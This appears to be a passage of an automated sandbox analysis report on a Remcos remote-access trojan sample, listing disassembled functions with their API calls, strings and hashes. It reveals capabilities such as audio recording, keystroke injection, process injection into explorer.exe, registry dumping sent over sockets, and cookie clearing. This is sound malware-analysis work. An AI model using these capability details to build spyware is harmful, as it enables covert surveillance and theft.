                        • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                        • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                        Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                        Download Yara Rule
                        APIs
                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                        • Sleep.KERNEL32(00000064), ref: 00417521
                        • DeleteFileW.KERNEL32(00000000), ref: 00417555
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CreateDeleteExecuteShellSleep
                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                        • API String ID: 1462127192-2001430897
                        • Opcode ID: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                        • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                        • Opcode Fuzzy Hash: 1f6a825730162cc8d70e4a327bcc3a42f02bec4a5cc2bca23683888e0af1c848
                        • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                        Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                        • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\user\AppData\Roaming\jdSldfVS.exe), ref: 0040749E
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CurrentProcess
                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                        • API String ID: 2050909247-4242073005
                        • Opcode ID: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                        • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                        • Opcode Fuzzy Hash: 539e8bced36223118afef646be0064b2910b8cfba0236f50484b60453eb32d25
                        • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                        Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                        Download Yara Rule
                        APIs
                        • _strftime.LIBCMT ref: 00401D50
                          • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                        • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                        • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                        • API String ID: 3809562944-243156785
                        • Opcode ID: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                        • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                        • Opcode Fuzzy Hash: 056d7ed0179ee1e3bc41876d6f94bfa6cd5a524795bf822a31929a0c00ad1597
                        • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                        Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                        Download Yara Rule
                        APIs
                        • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                        • int.LIBCPMT ref: 00410E81
                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                        • std::_Facet_Register.LIBCPMT ref: 00410EC1
                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                        • __Init_thread_footer.LIBCMT ref: 00410F29
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                        • String ID: ,kG$0kG
                        • API String ID: 3815856325-2015055088
                        • Opcode ID: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                        • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                        • Opcode Fuzzy Hash: e119dbdcd7508405a4e8dfb13a442e59be6990f0aecb212b832b7139a16d9266
                        • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                        Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                        Download Yara Rule
                        APIs
                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                        • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                        • waveInStart.WINMM ref: 00401CFE
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                        • String ID: dMG$|MG$PG
                        • API String ID: 1356121797-532278878
                        • Opcode ID: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                        • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                        • Opcode Fuzzy Hash: f0413ad6b7edbe83be065844dac3f0d77922414ea45c2d30098e63d2db50c4df
                        • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                        Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                        Download Yara Rule
                        APIs
                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                          • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                          • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                          • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                        • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                        • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                        • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                        • TranslateMessage.USER32(?), ref: 0041D4E9
                        • DispatchMessageA.USER32(?), ref: 0041D4F3
                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                        • String ID: Remcos
                        • API String ID: 1970332568-165870891
                        • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                        • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                        • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                        • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                        Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                        • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                        • Opcode Fuzzy Hash: 5edaaaea362a6c10ef7d8e875ae5e8a922473b35402a21f9a1197ff68539a873
                        • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                        Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                          • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                          • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                          • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                        • _memcmp.LIBVCRUNTIME ref: 00445423
                        • _free.LIBCMT ref: 00445494
                        • _free.LIBCMT ref: 004454AD
                        • _free.LIBCMT ref: 004454DF
                        • _free.LIBCMT ref: 004454E8
                        • _free.LIBCMT ref: 004454F4
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free$ErrorLast$_abort_memcmp
                        • String ID: C
                        • API String ID: 1679612858-1037565863
                        • Opcode ID: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                        • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                        • Opcode Fuzzy Hash: 3b59ec677d4d175c50db296303e2411e5fb3dbfaa0361dba4d40d6cf04aba7d4
                        • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                        Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: tcp$udp
                        • API String ID: 0-3725065008
                        • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                        • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                        • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                        • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                        Function 00411CFE Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 206memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0041179C: SetLastError.KERNEL32(0000000D,00411D1C,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 004117A2
                        • SetLastError.KERNEL32(000000C1,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411D37
                        • GetNativeSystemInfo.KERNEL32(?,?,00000000,t^F,?,?,?,?,?,?,?,?,?,?,?,00411CFA), ref: 00411DA5
                        • SetLastError.KERNEL32(0000000E), ref: 00411DC9
                          • Part of subcall function 00411CA3: VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000,00411DE7,?,00000000,00003000,00000040,00000000), ref: 00411CB3
                        • GetProcessHeap.KERNEL32(00000008,00000040), ref: 00411E10
                        • HeapAlloc.KERNEL32(00000000), ref: 00411E17
                        • SetLastError.KERNEL32(0000045A), ref: 00411F2A
                          • Part of subcall function 00412077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F37), ref: 004120E7
                          • Part of subcall function 00412077: HeapFree.KERNEL32(00000000), ref: 004120EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                        • String ID: t^F
                        • API String ID: 3950776272-389975521
                        • Opcode ID: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                        • Instruction ID: a5564978de1508fcfe39aaa31f5973b4ee53e0220ffe5d2cf9b9f7f7cc9a58c7
                        • Opcode Fuzzy Hash: 461a53a6892bac39e8501077da2db8edf6161aa159888280e3eaf045f7e1ced3
                        • Instruction Fuzzy Hash: B661E370601201ABC7109F66C980BAB7BA5BF44744F04411BFA058B7A2E7BCE8D2CBD9
                        Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                        Download Yara Rule
                        APIs
                        • __Init_thread_footer.LIBCMT ref: 004018BE
                        • ExitThread.KERNEL32 ref: 004018F6
                        • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                        • String ID: PkG$XMG$NG$NG
                        • API String ID: 1649129571-3151166067
                        • Opcode ID: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                        • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                        • Opcode Fuzzy Hash: f03e1696385eff321045f3fd04ccd2f00e10c82d765726f3dffbcfbdf912789a
                        • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                        Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                        • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                        • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                        • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                        • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                          • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                          • Part of subcall function 00404B96: SetEvent.KERNEL32(?), ref: 00404BC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                        • String ID: .part
                        • API String ID: 1303771098-3499674018
                        • Opcode ID: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                        • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                        • Opcode Fuzzy Hash: 3af979d2a86f55abb037a5ea190009b8bddef8696a723389280064d929b35107
                        • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                        Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                        • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                        • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: InputSend
                        • String ID:
                        • API String ID: 3431551938-0
                        • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                        • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                        • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                        • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                        Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: __freea$__alloca_probe_16_free
                        • String ID: a/p$am/pm$zD
                        • API String ID: 2936374016-2723203690
                        • Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                        • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                        • Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                        • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                        Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                        • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: Enum$InfoQueryValue
                        • String ID: [regsplt]$xUG$TG
                        • API String ID: 3554306468-1165877943
                        • Opcode ID: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                        • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                        • Opcode Fuzzy Hash: e28986e9332aa07a6eea5a33b9e26ecc66a365c7f4eba0dbebaa861638ff76d3
                        • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                        Function 00456C1A Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 152COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: _free
                        • String ID: D[E$D[E
                        • API String ID: 269201875-3695742444
                        • Opcode ID: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                        • Instruction ID: e1ec1e089ae9cf4c30c2343e7c59e1c9a5dba52e91c7d03f0b1416238821c5a9
                        • Opcode Fuzzy Hash: a6e07d2e332d0ea6e1aa7b7f7b4c4c7b9128dbb8fddfed026ac15973f0d55745
                        • Instruction Fuzzy Hash: 7A415B31A001046BEB216BBA8C4566F3BB4EF41336F96061BFC24D7293DA7C880D566D
                        Function 00413D0D Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 135registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                          • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                          • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                        • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEnumInfoOpenQuerysend
                        • String ID: xUG$NG$NG$TG
                        • API String ID: 3114080316-2811732169
                        • Opcode ID: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                        • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                        • Opcode Fuzzy Hash: f2e89265f4d2f0cfb10cd8f2c72011435137814bee02f1038c413f2e8c362d66
                        • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                        Function 0045112C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                        • __alloca_probe_16.LIBCMT ref: 004511B1
                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                        • __freea.LIBCMT ref: 0045121D
                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                        • String ID: PkGNG
                        • API String ID: 313313983-263838557
                        • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                        • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                        • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                        • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                        Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                          • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                          • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                          • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                        • _wcslen.LIBCMT ref: 0041B763
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                        • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                        • API String ID: 37874593-122982132
                        • Opcode ID: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                        • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                        • Opcode Fuzzy Hash: 2f5c0ff3d6ea7972f87a7f3e3c7ffac37502a487daadfbe7cd55c680b7f4a926
                        • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                        Function 0040BEE9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 87COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                          • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                          • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                        • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BF6B
                        • PathFileExistsA.SHLWAPI(?), ref: 0040BF78
                        Strings
                        Memory Dump Source
                        • Source File: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_400000_jdSldfVS.jbxd
                        Yara matches
                        Similarity
                        • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                        • String ID: [IE cookies cleared!]$[IE cookies not found]$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
